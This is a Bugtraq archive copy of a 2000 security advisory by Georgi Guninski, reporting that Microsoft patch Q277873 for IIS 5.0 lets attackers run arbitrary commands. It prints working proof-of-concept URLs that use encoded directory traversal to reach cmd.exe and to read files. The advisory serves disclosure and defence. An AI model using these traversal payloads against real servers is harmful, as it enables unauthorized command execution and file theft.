Bugtraq mailing list archives
IIS 5.0 with patch Q277873 allows executing arbitrary commands on the web server
From: Georgi Guninski <guninski () GUNINSKI COM>
Date: Mon, 27 Nov 2000 18:53:18 +0200
Georgi Guninski security advisory #30, 2000 IIS 5.0 with patch Q277873 allows executing arbitrary commands on the web server Systems affected: IIS 5.0 with patch Q277873 applied (the patch is the problem) Risk: High Date: 27 November 2000 Legal Notice: This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski, bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Announcement: I have set up an experimental mailing list about client and web security - there you may learn faster about my discoveries and how to protect your clients. Check: http://www.guninski.com/mailinglist.html Description: If patch Q277873 is installed on IIS 5.0 then it is possible to execute arbitrary programs on the web server. The following URL: -------------------------------------------- http://SOMEHOST/scripts/georgi.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\ -------------------------------------------- executes "DIR C:\" When you are prompted save the output to a file. It is possble to play with the MSADC directory instead of scripts. It is also possible to read most files using: http://SOMEHOST/scripts/georgi.asp/..%C1%9C..%C1%9C..%C1%9Ctest.txt Details: Microsoft issued: " Microsoft Security Bulletin (MS00-086) Patch Available for "Web Server File Request Parsing" Vulnerability Originally posted: November 06, 2000 Updated: November 21, 2000 " which installs patch Q277873. Unfortunately patch Q277873 opens another vulnerability which allows executing arbitrary programs on the web server. Workaround: I suggest deinstalling patch Q277873 until Microsoft patch it properly - I believe in this case you are exposed to less risk. Vendor status: Microsoft was contacted on 25 November 2000. Check my experimental mailing list at: http://www.guninski.com/mailinglist.html Regards, Georgi Guninski http://www.guninski.com
Current thread:
- IIS 5.0 with patch Q277873 allows executing arbitrary commands on the web server Georgi Guninski (Nov 28)